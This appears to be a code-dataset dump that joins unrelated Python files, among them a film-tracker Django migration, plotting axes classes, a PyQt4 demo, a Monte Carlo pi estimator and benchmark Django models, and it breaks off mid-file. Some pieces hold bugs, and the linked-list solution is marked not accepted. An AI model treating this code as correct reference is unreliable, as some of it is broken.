def a_x(self, i, j):
sumstring = {
'x+': self.sum_string(i, j, 'x+'),
'x-': self.sum_string(i, j, 'x-'),
'y+': self.sum_string(i, j, 'y+'),
'y-': self.sum_string(i, j, 'y-'),
'z+': self.sum_string(i, j, 'z+'),
'z-': self.sum_string(i, j, 'z-')
}
maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0
if maximum == 0: return 0
prefactor = qand([
qand([
qxnor(sumstring['%s+' % k][r],
sumstring['%s-' % k][r])
for r in range(maximum)])
for k in ['y', 'z']])
return prefactor * \
( qxor(sumstring['x+'][0],
sumstring['x-'][0]) \
* qand([
qxnor(sumstring['x+'][r],
sumstring['x-'][r])
for r in range(1, maximum)]) \
+ sum([
qxor(sumstring['x+'][p-2],
sumstring['x+'][p-1]) \
* qand([
qxnor(sumstring['x+'][r-1],
sumstring['x+'][r])
for r in range(1, p-1)]) \
* qand([
qxor(sumstring['x+'][r-1],
sumstring['x-'][r-1])
for r in range(1, p+1)]) \
* qand([
qxnor(sumstring['x+'][r-1],
sumstring['x-'][r-1])
for r in range(p+1, maximum+1)])
for p in range(2, maximum+1)]))
def a_y(self, i, j):
sumstring = {
'x+': self.sum_string(i, j, 'x+'),
'x-': self.sum_string(i, j, 'x-'),
'y+': self.sum_string(i, j, 'y+'),
'y-': self.sum_string(i, j, 'y-'),
'z+': self.sum_string(i, j, 'z+'),
'z-': self.sum_string(i, j, 'z-')
}
maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0
if maximum == 0: return 0
prefactor = qand([
qand([
qxnor(sumstring['%s+' % k][r],
sumstring['%s-' % k][r])
for r in range(maximum)])
for k in ['x', 'z']])
return prefactor * \
( qxor(sumstring['y+'][0],
sumstring['y-'][0]) \
* qand([
qxnor(sumstring['y+'][r],
sumstring['y-'][r])
for r in range(1, maximum)]) \
+ sum([
qxor(sumstring['y+'][p-2],
sumstring['y+'][p-1]) \
* qand([
qxnor(sumstring['y+'][r-1],
sumstring['y+'][r])
for r in range(1, p-1)]) \
* qand([
qxor(sumstring['y+'][r-1],
sumstring['y-'][r-1])
for r in range(1, p+1)]) \
* qand([
qxnor(sumstring['y+'][r-1],
sumstring['y-'][r-1])
for r in range(p+1, maximum+1)])
for p in range(2, maximum+1)]))
def a_z(self, i, j):
sumstring = {
'x+': self.sum_string(i, j, 'x+'),
'x-': self.sum_string(i, j, 'x-'),
'y+': self.sum_string(i, j, 'y+'),
'y-': self.sum_string(i, j, 'y-'),
'z+': self.sum_string(i, j, 'z+'),
'z-': self.sum_string(i, j, 'z-')
}
maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0
if maximum == 0: return 0
prefactor = qand([
qand([
qxnor(sumstring['%s+' % k][r],
sumstring['%s-' % k][r])
for r in range(maximum)])
for k in ['x', 'y']])
return prefactor * \
( qxor(sumstring['z+'][0],
sumstring['z-'][0]) \
* qand([
qxnor(sumstring['z+'][r],
sumstring['z-'][r])
for r in range(1, maximum)]) \
+ sum([
qxor(sumstring['z+'][p-2],
sumstring['z+'][p-1]) \
* qand([
qxnor(sumstring['z+'][r-1],
sumstring['z+'][r])
for r in range(1, p-1)]) \
* qand([
qxor(sumstring['z+'][r-1],
sumstring['z-'][r-1])
for r in range(1, p+1)]) \
* qand([
qxnor(sumstring['z+'][r-1],
sumstring['z-'][r-1])
for r in range(p+1, maximum+1)])
for p in range(2, maximum+1)]))
def interaction_term_ij(self, i, j):
return -1* self.int_mat[i, j] * (self.a_x(i, j) + \
self.a_y(i, j) + \
self.a_z(i, j))
def interaction_term(self):
"""Computes contacts between residues."""
expr = sp.numbers.Integer(0)
for i in range(self.naas-3):
for j in range(1, math.ceil((self.naas-i-1)/2)):
if self.int_mat[i, 1+i+2*j] == 0: continue
expr += interaction_term_ij(i, 1+i+2*j)
return expr
| 2.359375 | 2 |
films/migrations/0001_initial.py | LucaAlexandru/MediaTracker | 0 | 12797484 | # Generated by Django 3.2.4 on 2021-10-11 10:34
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Film',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('film_name', models.CharField(max_length=100)),
('film_release_date', models.DateField(null=True)),
('film_genre', models.CharField(max_length=50)),
('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default='unrated', max_length=10)),
('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated show')], default='movie', max_length=50)),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 1.859375 | 2 |
oculy/plotting/plots/axes.py | MatthieuDartiailh/oculy | 0 | 12797485 | <gh_stars>0
# --------------------------------------------------------------------------------------
# Copyright 2020-2021 by Oculy Authors, see git history for more details.
#
# Distributed under the terms of the BSD license.
#
# The full license is in the file LICENCE, distributed with this software.
# --------------------------------------------------------------------------------------
"""Axis, axes, colorbar and their associated proxy.
"""
from typing import Any, Mapping, Optional, Sequence, Tuple
from atom.api import Bool, Dict, Enum, Float, ForwardTyped, Int, List, Str
from atom.api import Tuple as ATuple
from atom.api import Typed
from ..backends.resolver import BackendResolver
from .base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported
class AxisProxy(PlotElementProxy):
"""Proxy for a single axis.
Handle:
- scaling
- bounds
"""
@mark_backend_unsupported
def set_axis_scale(self, scale): # lin, log
raise NotImplementedError()
@mark_backend_unsupported
def set_autoscaling(self, setting: bool):
pass
@mark_backend_unsupported
def set_limits(self, limits): # Limited to axis with no breaks
pass
@mark_backend_unsupported
def set_limits_with_breaks(self, limits):
pass
@mark_backend_unsupported
def invert_axis(self, state: bool):
pass
@mark_backend_unsupported
def set_label(self, title: str, font: Mapping[str, Any]):
pass
@mark_backend_unsupported
def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]):
pass
@mark_backend_unsupported
def set_tick_position(self, position: str):
pass
class ColorbarProxy(PlotElementProxy):
"""Proxy for the colorbar attached to a colorplot."""
@mark_backend_unsupported
def set_axis_scale(self, scale): # lin, log
raise NotImplementedError()
@mark_backend_unsupported
def set_autoscaling(self, setting: bool):
pass
@mark_backend_unsupported
def set_limits(self, limits): # Limited to axis with no breaks
pass
@mark_backend_unsupported
def set_limits_with_breaks(self, limits):
pass
@mark_backend_unsupported
def set_label(self, title: str, font: Mapping[str, Any]):
pass
@mark_backend_unsupported
def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]):
pass
class CursorProxy(PlotElementProxy):
"""Proxy for a cursor."""
pass
class AxesProxy(PlotElementProxy):
"""Proxy for axes.
As in matplotlib an axis is expected to provide way to draw into the axis
and way to manipulate the axis appearance.
"""
@mark_backend_unsupported
def enable_zooming(self, bound: str, button: str):
pass
@mark_backend_unsupported
def disable_zooming(self):
pass
@mark_backend_unsupported
def enable_panning(self, button: str):
pass
@mark_backend_unsupported
def disable_panning(self):
pass
@mark_backend_unsupported
def add_axis(self, axes=None):
pass
@mark_backend_unsupported
def remove_axis(self):
pass
@mark_backend_unsupported
def set_projections(self):
pass
@mark_backend_unsupported
def add_cursor(
self, axes=None
): # Need to specify to which axes the cursor is bound
pass
@mark_backend_unsupported
def remove_cursor(self):
pass
@mark_backend_unsupported
def enable_major_grid(self):
pass
@mark_backend_unsupported
def disable_major_grid(self):
pass
@mark_backend_unsupported
def enable_minor_grid(self):
pass
@mark_backend_unsupported
def disable_minor_grid(self):
pass
@mark_backend_unsupported
def set_legend(self, legend: Mapping[str, str]):
pass
@mark_backend_unsupported
def remove_plot(self, id):
pass
@mark_backend_unsupported
def add_line(
self,
id: str,
orientation: str,
position: float,
bounds: Optional[Tuple[float, float]] = None,
):
pass
@mark_backend_unsupported
def remove_line(self, id: str) -> None:
pass
class Axis(PlotElement):
"""Axis of a plot."""
#: Reference to the parent axes.
axes = ForwardTyped(lambda: Axes)
#: Should that axis be autoscaled
auto_scaling = Bool()
#: List of 2 tuple representing a possibly discountinuous axis.
limits = List(tuple)
#: Is the axis direction inverted.
inverted = Bool()
#: Label of the axis
label = Str()
#: Tick labels.
tick_labels = List(str)
#: Font used for the label
label_font = Dict(str)
#: Font used for the tick labels
tick_labels_font = Dict(str)
#: Intercept position of this axis with the other axis in data coordinate.
#: Setting this values will have an impact only if there are only 2 active
#: axes in the axes_set.
intercept = Float()
# FIXME Add connections to the proxy and a way to prevent self recursion
# FIXME Add convenience to connect axes between them
class Colorbar(PlotElement):
"""Colorbar for a 2D plot."""
#: Reference to the parent axes.
axes = ForwardTyped(lambda: Axes)
#: Position at which the colorbar should be created.
location = Enum("right", "top", "left", "bottom")
#: Should that axis be autoscaled
auto_scaling = Bool()
#: List of 2 tuple representing a possibly discountinuous axis.
limits = List(tuple)
#: Label of the axis
label = Str()
#: Tick labels.
tick_labels = List(str)
#: Font used for the label
label_font = Dict(str)
#: Font used for the tick labels
tick_labels_font = Dict(str)
#:
aspect_ratio = Int(20)
class Cursor(PlotElement):
"""Cursor on a plot."""
#:
x_value = Float()
#:
y_value = Float()
#:
c_value = Float(float("nan"))
# FIXME need to sync to the proxy
def _resolve_figure():
from .figure import Figure
return Figure
class Axes(PlotElement):
"""Axes of a plot"""
#: Reference to the figure holding the axes.
figure = ForwardTyped(_resolve_figure)
#: Axes composing this object.
left_axis = Typed(Axis)
bottom_axis = Typed(Axis)
right_axis = Typed(Axis)
top_axis = Typed(Axis)
#: Colorbar associated with plot if any.
colorbar = Typed(Colorbar)
#: Set of cursors currently active on the graph
cursors = ATuple(Cursor)
#: Set of plots currently displayed in the axes
plots = Dict(str, BasePlot)
#: Display a major grid
major_grid_enabled = Bool()
#: Display a minor grid
minor_grid_enabled = Bool()
#:
# SHOULD NOT be edited in place.
legends = Dict(str, str)
#: Projection to use on the axes.
projection = Enum("cartesian", "polar")
def __init__(self, **kwargs):
super().__init__(**kwargs)
if not self.bottom_axis or self.top_axis:
self.bottom_axis = Axis(axes=self)
if not self.left_axis or self.right_axis:
self.left_axis = Axis(axes=self)
def initialize(self, resolver):
"""Initialize the proxy of the object and the axes."""
super().initialize(resolver)
for axis in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis):
if not axis:
continue
axis.backend_name = self.backend_name
axis.initialize(resolver)
if self.colorbar:
self.colorbar.backend_name = self.backend_name
self.colorbar.initialize(resolver)
for c in self.cursors:
c.backend_name = self.backend_name
c.initialize(resolver)
for p in self.plots.values():
p.backend_name = self.backend_name
p.initialize(resolver)
#: Conserve a reference to the resolver to be able to add more elements
#: later on.
self._resolver = resolver
def finalize(self):
"""Finalize the proxy of the figure."""
for p in self.plots.values():
p.finalize()
for c in self.cursors:
c.finalize()
if self.colorbar:
self.colorbar.finalize()
for axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis):
axis.finalize()
super().finalize()
def add_cursor(self, axes: Tuple[str, str]): # What axis are we linked to
pass
def remove_cursor(self, index: int):
pass
def add_plot(self, plot) -> None:
"""Add a plot to the axes."""
if plot.id in self.plots:
raise RuntimeError(f"A plot with {id} already exist in axes {self}")
axes = plot.axes_mapping
if not axes:
axes = {
"x": "bottom" if self.bottom_axis else "top",
"y": "left" if self.left_axis else "right",
}
plot.axes_mapping = axes
# Validate the axes supposed to be used.
if any(
(
pa not in ("left", "bottom", "right", "top")
or getattr(self, f"{pa}_axis") is None
)
for pa in axes.values()
):
unknown = []
missing = []
for lab, pa in axes.items():
if pa not in ("left", "bottom", "right", "top"):
unknown.append((lab, pa))
elif getattr(axes, f"{pa}_axis") is None:
missing.append((lab, pa))
if missing:
raise RuntimeError(
f"The axes used for {[lab for lab, _ in unknown]} do not "
"correspond to any valid axes (valid axes are "
"'left', 'right', 'top', 'bottom', provided axes are "
f"{[pa for _, pa in unknown]})."
)
else:
raise RuntimeError(
f"The axes used for {[lab for lab, _ in missing]} do not "
"exist. Existing axes are "
f"{[ax for ax in axes.axes._fields if axes.axes[ax] is not None]}, "
f"specified axes are {[pa for _, pa in missing]}."
)
# Make sure the plot knows where it is plotted.
plot.axes = self
self.plots[plot.id] = plot
# Initialize the plot if we have a resolver
if self._resolver:
plot.initialize(self._resolver)
def remove_plot(self, id):
"""Remove a plot based on its ID."""
if id not in self.plots:
raise KeyError(
f"Plot {id} does not exist in axes {self.axes},"
f" known plots are {self.plots}"
)
if not self.proxy:
raise RuntimeError(f"Axes {self} does not have an active proxy.")
self.proxy.remove_plot(id, self.plots[id])
def add_colorbar(self):
"""Add a colorbar to the axes."""
if self.colorbar:
return
self.colorbar = Colorbar(axes=self)
if self._resolver:
self.colorbar.initialize(self._resolver)
def remove_colorbar(self):
"""Remove the colorbar from the axes."""
self.colorbar.finalize()
del self.colorbar
def add_line(
self,
id: str,
orientation: str,
position: float,
bounds: Optional[Tuple[float, float]] = None,
):
pass
def remove_line(self, id: str) -> None:
pass
# FIXME Need to define the proper API to enable zooming/panning and modifiers
# TODO Add the ability to link axes (accross different figures ie beyond
# matplotlib default)
# --- Private API
#: Reference to the backend resolver needed to dynamically add axes
_resolver = Typed(BackendResolver)
| 2.125 | 2 |
python_obfuscator/helpers/__init__.py | gjp4tw/python-obfuscator | 61 | 12797486 | from .variable_name_generator import VariableNameGenerator
from .random_datatype import RandomDataTypeGenerator
| 1.179688 | 1 |
iris/services/node.py | kpanic/lymph | 0 | 12797487 | import json
import logging
import gevent
import os
import psutil
import six
from gevent import subprocess
from six.moves import range
from iris.core.interfaces import Interface
from iris.utils.sockets import create_socket
logger = logging.getLogger(__name__)
class Process(object):
def __init__(self, cmd, env=None):
self.cmd = cmd
self.env = env
self._process = None
self._popen = None
def is_running(self):
return self._process and self._process.is_running()
def start(self):
self._popen = subprocess.Popen(
self.cmd, env=self.env, close_fds=False)
self._process = psutil.Process(self._popen.pid)
def stop(self):
try:
self._process.terminate()
self._process.wait()
except psutil.NoSuchProcess:
pass
def restart(self):
print("restarting %s" % self)
self.stop()
self.start()
def stats(self):
try:
memory = self._process.memory_info()
return {
'memory': {'rss': memory.rss, 'vms': memory.vms},
'cpu': self._process.cpu_percent(interval=2.0),
}
except psutil.NoSuchProcess:
return {}
class Node(Interface):
register_with_coordinator = False
def __init__(self, *args, **kwargs):
super(Node, self).__init__(*args, **kwargs)
self.sockets = {}
self.processes = []
self.running = False
self._sockets = []
self._services = []
def stats(self):
process_stats = []
for p in self.processes:
if not p.is_running():
continue
process_stats.append({
'command': p.cmd,
'stats': p.stats(),
})
return {'processes': process_stats}
def apply_config(self, config):
for name, c in six.iteritems(config.get('instances', {})):
self._services.append((name, c.get('command'), c.get('numprocesses', 1)))
for name, c in six.iteritems(config.get('sockets', {})):
self._sockets.append((name, c.get('host'), c.get('port')))
def on_start(self):
self.create_shared_sockets()
self.running = True
shared_fds = json.dumps({port: s.fileno() for port, s in six.iteritems(self.sockets)})
for service_type, cmd, num in self._services:
env = os.environ.copy()
env['IRIS_NODE'] = self.container.endpoint
env['IRIS_NODE_IP'] = self.container.ip
env['IRIS_SHARED_SOCKET_FDS'] = shared_fds
for i in range(num):
p = Process(cmd.split(' '), env=env)
self.processes.append(p)
logger.info('starting %s', cmd)
p.start()
gevent.spawn(self.watch_processes)
def on_stop(self):
logger.info("waiting for all service processes to die ...")
self.running = False
for p in self.processes:
p.stop()
super(Node, self).on_stop()
def create_shared_sockets(self):
for name, host, port in self._sockets:
sock = create_socket(
'%s:%s' % (host or self.container.ip, port), inheritable=True)
self.sockets[port] = sock
def restart_all(self):
for process in self.processes:
process.stop()
def watch_processes(self):
while True:
for process in self.processes:
try:
status = process._process.status
except psutil.NoSuchProcess:
if self.running:
process.start()
continue
if status in (psutil.STATUS_ZOMBIE, psutil.STATUS_DEAD):
if self.running:
process.restart()
gevent.sleep(1)
| 2.046875 | 2 |
pyqt_demo/test1.py | yzwxx/Label_Lab | 0 | 12797488 | <reponame>yzwxx/Label_Lab<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
a window with menu bar and tool bar
QAction with addAction for event handling(setting hot keys,showing status tip)
set window icon
'''
import os
from os.path import join
import sys
from PyQt4 import QtGui,QtCore
icon_path = join(os.getcwd(),'icon.png')
class Example1(QtGui.QMainWindow):
def __init__(self):
super(Example1, self).__init__()
self.initUI()
def initUI(self):
# text edit
textEdit = QtGui.QTextEdit()
self.setCentralWidget(textEdit)
# menubar's action
exitAction = QtGui.QAction('&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit application')
exitAction.triggered.connect(QtGui.QApplication.quit)
self.statusBar().showMessage('Ready')
# menubar
menubar = self.menuBar()
menubar.setNativeMenuBar(False)
fileMenu = menubar.addMenu('&File')
fileMenu.addAction(exitAction) # binding the action to the menu in menubar
# toolbar
self.toolbar = QtGui.QToolBar('name')
self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.toolbar.addAction(exitAction)
self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar)
self.toolbar2 = QtGui.QToolBar('name')
self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.toolbar2.addAction(exitAction)
self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2)
self.setGeometry(500, 300, 550, 350) # set location of app windows on screen and its size
self.setWindowTitle('GUI Demo')
# window icon
self.setWindowIcon(QtGui.QIcon(icon_path))
# tooltip
# QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10))
# self.setToolTip('This is a <b>QWidget</b> widget')
# create buttons
btn = QtGui.QPushButton('Button', self)
# btn.setToolTip('This is a <b>QPushButton</b> widget')
btn.resize(btn.sizeHint())
btn.move(0, 300)
qbtn = QtGui.QPushButton('Quit', self)
qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit)
qbtn.resize(qbtn.sizeHint())
qbtn.move(100, 300)
# status bar
# self.statusBar().showMessage('Ready')
# self.statusBar().showMessage('not Ready')
# center the window on screen
self.center()
self.show()
def closeEvent(self, event):
reply = QtGui.QMessageBox.question(self, 'Message',
"Are you sure to quit?", QtGui.QMessageBox.Yes |
QtGui.QMessageBox.No, QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.Yes:
event.accept()
else:
event.ignore()
def center(self):
qr = self.frameGeometry()
cp = QtGui.QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def main():
app = QtGui.QApplication(sys.argv) # Every PyQt4 application must create an application object
#print sys.argv[1:]
ex = Example1()
sys.exit(app.exec_()) # The event handling starts from this point
if __name__ == '__main__':
main() | 2.484375 | 2 |
python_submission/707.design-linked-list.199616840.notac.py | stavanmehta/leetcode | 0 | 12797489 | <filename>python_submission/707.design-linked-list.199616840.notac.py
class Node(object):
def __init__(self, value, nextNode=None):
self.val = value
self.next = nextNode
class MyLinkedList(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.head = None
self.size = 0
def get(self, index):
"""
Get the value of the index-th node in the linked list. If the index is invalid, return -1.
:type index: int
:rtype: int
"""
if index < 0 or index >= self.size:
return -1
counter = 0
curr = self.head
while curr:
if counter == index:
return curr.val
counter += 1
curr = curr.next
def addAtHead(self, val):
"""
Add a node of value val before the first element of the linked list. After the insertion, the new node will be the first node of the linked list.
:type val: int
:rtype: void
"""
node = Node(val)
if self.head:
node.next = self.head
self.head = node
else:
self.head = node
self.size += 1
def addAtTail(self, val):
"""
Append a node of value val to the last element of the linked list.
:type val: int
:rtype: void
"""
node = Node(val)
if not self.head:
self.head = node
else:
curr = self.head
while curr.next:
curr = curr.next
curr.next = node
self.size += 1
def addAtIndex(self, index, val):
"""
Add a node of value val before the index-th node in the linked list. If index equals to the length of linked list, the node will be appended to the end of linked list. If index is greater than the length, the node will not be inserted.
:type index: int
:type val: int
:rtype: void
"""
if self.size == 0 or index == 0:
self.addAtHead(val)
else:
node = Node(val)
counter = 0
curr = self.head
while curr:
if counter == index-1:
node.next = curr.next
curr.next = node
self.size += 1
return
else:
curr = curr.next
def deleteAtIndex(self, index):
"""
Delete the index-th node in the linked list, if the index is valid.
:type index: int
:rtype: void
"""
curr = self.head
if index == 0 and self.size == 1 and self.head:
self.head = None
self.size -= 1
elif self.size > 1:
counter = 0
prev = None
next = self.head
while next:
if counter == index:
prev.next = next.next
self.size -= 1
return
else:
prev = next
next = next.next
counter += 1
# Your MyLinkedList object will be instantiated and called as such:
# obj = MyLinkedList()
# param_1 = obj.get(index)
# obj.addAtHead(val)
# obj.addAtTail(val)
# obj.addAtIndex(index,val)
# obj.deleteAtIndex(index)
| 4.1875 | 4 |
commons.py | projectcuisines/gcm_ana | 1 | 12797490 | <reponame>projectcuisines/gcm_ana<filename>commons.py<gh_stars>1-10
# -*- coding: utf-8 -*-
"""Definitions and objects commonly used between scripts."""
MODELS = {
"ExoCAM": {
"title": "ExoCAM",
"color": "tab:blue",
},
"LMDG": {
"title": "LMD-G",
"color": "tab:red",
},
"ROCKE3D": {
"title": "ROCKE-3D",
"color": "tab:green",
},
"UM": {
"title": "UM",
"color": "tab:orange",
},
}
| 1.460938 | 1 |
main.py | MikhSol/monte_carlo_simulation_of_pi | 0 | 12797491 | <gh_stars>0
from random import random
import time
import logging
import matplotlib.pyplot as plt
logger = logging.getLogger()
logging.basicConfig(level=logging.INFO)
def estimate_pi(trials):
start = time.process_time()
count = 0
for _ in range(trials + 1):
x, y = random(), random()
if x * x + y * y <= 1:
count += 1
logger.info("estimate pi with " + str(trials) +
" trials processing time: " +
str(time.process_time() - start))
return 4 * count / trials
def generate_sample(trials):
in_x, in_y, out_x, out_y = [], [], [], []
for _ in range(trials + 1):
x, y = random(), random()
if x * x + y * y <= 1:
in_x.append(x), in_y.append(y)
else:
out_x.append(x), out_y.append(y)
return in_x, in_y, out_x, out_y
def draw_estimation(trials):
in_x, in_y, out_x, out_y = generate_sample(trials)
plt.plot(in_x, in_y, 'x', color='r')
plt.plot(out_x, out_y, 'o', color='b')
plt.show()
def main():
print(estimate_pi(10000000))
draw_estimation(10000)
if __name__ == '__main__':
main() | 3.0625 | 3 |
benchmark/models.py | ens-lgil/PGS_Catalog | 1 | 12797492 | <filename>benchmark/models.py
from django.db import models
from django.conf import settings
from django.core.validators import MaxValueValidator, MinValueValidator
from django.contrib.postgres.fields import DecimalRangeField
class BM_Coding(models.Model):
"""Class to describe the International Classification of Diseases used in PGS """
id = models.CharField('Code ID', max_length=30, primary_key=True)
label = models.CharField('Code Label', max_length=500, db_index=True)
type = models.CharField('Code Type', max_length=10)
class BM_Cohort(models.Model):
"""Class to describe cohorts used in samples"""
name_short = models.CharField('Cohort Short Name', max_length=100, db_index=True)
name_full = models.CharField('Cohort Full Name', max_length=1000)
def __str__(self):
return self.name_short
class BM_EFOTrait(models.Model):
"""Abstract class to hold information related to controlled trait vocabulary
(mainly to link multiple EFO to a single score)"""
id = models.CharField('Ontology Trait ID', max_length=30, primary_key=True)
label = models.CharField('Ontology Trait Label', max_length=500, db_index=True)
description = models.TextField('Ontology Trait Description', null=True)
#url = models.CharField('Ontology URL', max_length=500)
#synonyms = models.TextField('Synonyms', null=True)
#mapped_terms = models.TextField('Mapped terms', null=True)
phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait')
def __str__(self):
return '%s | %s '%(self.id, self.label)
@property
def display_label(self):
return '<a href="../../benchmark/%s">%s</a>'%(self.id, self.label)
#@property
#def display_id_url(self):
# return '<a href="%s">%s</a><span class="only_export">: %s</span>'%(self.url, self.id, self.url)
@property
def display_phenotype_structured(self):
data = []
phenotype_structured = self.phenotype_structured.all()
for phenotype in self.phenotype_structured.all():
data.append('<b>'+phenotype.id+'</b>: '+phenotype.label)
return data
def get_bm_data(self):
self.bm_data = {}
data_types = ['scores', 'cohorts', 'samples', 'ancestries']
data = {}
for type in data_types:
data[type] = set()
#for bm_performance in BM_Performance.objects.using("benchmark").filter(efotrait=self).order_by('id'):
for bm_performance in self.efotrait_performance.all():
#print(str(bm_performance))
data['scores'].add(bm_performance.score_id)
data['cohorts'].add(bm_performance.cohort)
data['samples'].add(bm_performance.sample.id)
data['ancestries'].add(bm_performance.sample.ancestry_broad)
for type in data_types:
#print(type+": "+str(list(data_count[type])))
self.bm_data[type] = list(data[type])
@property
def count_scores(self):
if not hasattr(self, 'bm_data'):
self.get_bm_data()
#scores = set()
#for bm_performance in BM_Performance.objects.using("benchmark").filter(efotrait=self).order_by('id'):
# scores.add(bm_performance.score_id)
return len(self.bm_data['scores'])
@property
def count_cohorts(self):
if not hasattr(self, 'bm_data'):
self.get_bm_data()
return len(self.bm_data['cohorts'])
#cohorts = set()
#for bm_performance in BM_Performance.objects.using("benchmark").filter(efotrait=self).order_by('id'):
# cohorts.add(bm_performance.cohort.id)
#return len(list(cohorts))
@property
def count_samples(self):
if not hasattr(self, 'bm_data'):
self.get_bm_data()
return len(self.bm_data['samples'])
@property
def cohorts_list(self):
if not hasattr(self, 'bm_data'):
self.get_bm_data()
return self.bm_data['cohorts']
@property
def ancestries_list(self):
if not hasattr(self, 'bm_data'):
self.get_bm_data()
return self.bm_data['ancestries']
#@property
#def synonyms_list(self):
# if self.synonyms:
# return self.synonyms.split(' | ')
# else:
# return []
#@property
#def mapped_terms_list(self):
# if self.mapped_terms:
# return self.mapped_terms.split(' | ')
# else:
# return []
#@property
#def category_list(self):
# return sorted(self.traitcategory.all(), key=lambda y: y.label)
#@property
#def category_labels_list(self):
# categories = self.category_list
# if len(categories) > 0:
# return [x.label for x in categories]
# else:
# return []
#@property
#def category_list(self):
# return sorted(self.traitcategory.all(), key=lambda y: y.label)
#@property
#def category_labels_list(self):
# categories = self.category_list
# if len(categories) > 0:
# return [x.label for x in categories]
# else:
# return []
#@property
#def category_labels(self):
# category_labels = self.category_labels_list
# categories_data = ''
# if len(category_labels) > 0:
# categories_data = ', '.join(category_labels)
# return categories_data
#@property
#def display_category_labels(self):
# categories = self.category_list
# categories_data = ''
# if len(categories) > 0:
# category_labels = []
# for category in categories:
# v_spacing = ' class="mt-1"' if len(category_labels) > 0 else ''
# category_labels.append('<div{}><span class="trait_colour" style="background-color:{}"></span>{}</div>'.format(v_spacing,category.colour,category.label))
# categories_data = ''.join(category_labels)
# return categories_data
class BM_Demographic(models.Model):
"""Class to describe Sample fields (sample_age, followup_time) that can be point estimates or distributions"""
estimate = models.FloatField(verbose_name='Estimate (value)', null=True)
estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g. [mean, median]
unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g. [years, months, days]
range = DecimalRangeField(verbose_name='Range (values)', null=True)
range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g. Confidence interval (ci), range, interquartile range (iqr), open range
variability = models.FloatField(verbose_name='Variability (value)', null=True)
variability_type = models.CharField(verbose_name='Range (type)', max_length=100, default='se') # e.g. standard deviation (sd), standard error (se)
def format_estimate(self):
if self.estimate != None:
return '{}:{}'.format(self.estimate_type, self.estimate)
return None
def format_range(self):
if self.estimate == None and self.range != None:
return '{}:{}'.format(self.range_type, str(self.range))
return None
def format_variability(self):
if self.variability != None:
return '{}:{}'.format(self.variability_type, self.variability)
return None
def format_unit(self):
if self.unit != None:
return '{}:{}'.format('unit', self.unit)
return None
def display_value(self):
l = []
helptip = '<span title="{}" class="pgs_helptip">{}</span> : {} {}'
no_helptip = '{} : {} {}'
# Estimate
e = ''
if self.estimate != None:
e += '{} : {}'.format(self.estimate_type.title(), self.estimate)
if self.range != None and self.range_type.lower() == 'ci':
e += ' {}'.format(str(self.range))
e += ' {}'.format(self.unit)
if len(e) > 0:
l.append(e)
# Variability
v = None
if self.variability != None:
type_desc = self.variability_type_desc()
if (type_desc):
v = helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit)
else:
v = no_helptip.format(self.variability_type.title(), self.variability, self.unit)
if v != None:
l.append(v)
# Range
r = None
if '[' not in e:
if self.range != None:
type_desc = self.range_type_desc()
if (type_desc):
r = helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit)
else:
r = no_helptip.format(self.range_type.title(), str(self.range), self.unit)
if r != None:
l.append(r)
if (len(l) == 1):
return l[0]
elif (len(l) > 1):
return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>'
else:
return ''
def display_values_dict(self):
l = {}
# Estimate
estimate = ''
if self.estimate != None:
estimate = str(self.estimate)
if self.range != None and self.range_type.lower() == 'ci':
estimate += str(self.range)
if estimate:
l[self.estimate_type] = estimate
# Range
if self.range != None and '[' not in estimate:
l[self.range_type] = str(self.range)
# Variability
if self.variability != None:
l[self.variability_type] = self.variability
# Unit
if self.unit != None:
l['unit'] = self.unit
return l
def range_type_desc(self):
desc_list = {
'ci': 'Confidence interval',
'iqr': 'Interquartile range'
}
if self.range_type.lower() in desc_list:
return desc_list[self.range_type.lower()]
def variability_type_desc(self):
desc_list = {
'sd': 'Standard Deviation',
'sd (cases)': 'Standard Deviation',
'se': 'Standard Error',
}
if self.variability_type.lower() in desc_list:
return desc_list[self.variability_type.lower()]
class BM_Sample(models.Model):
"""Class to describe samples used in variant associations and PGS training/testing"""
# Sample Information
## Numbers
sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)])
sample_cases = models.IntegerField('Number of Cases', null=True)
sample_controls = models.IntegerField('Number of Controls', null=True)
# Sample sex type information
SAMPLE_SEX_CHOICES = [
('Both', 'Both'),
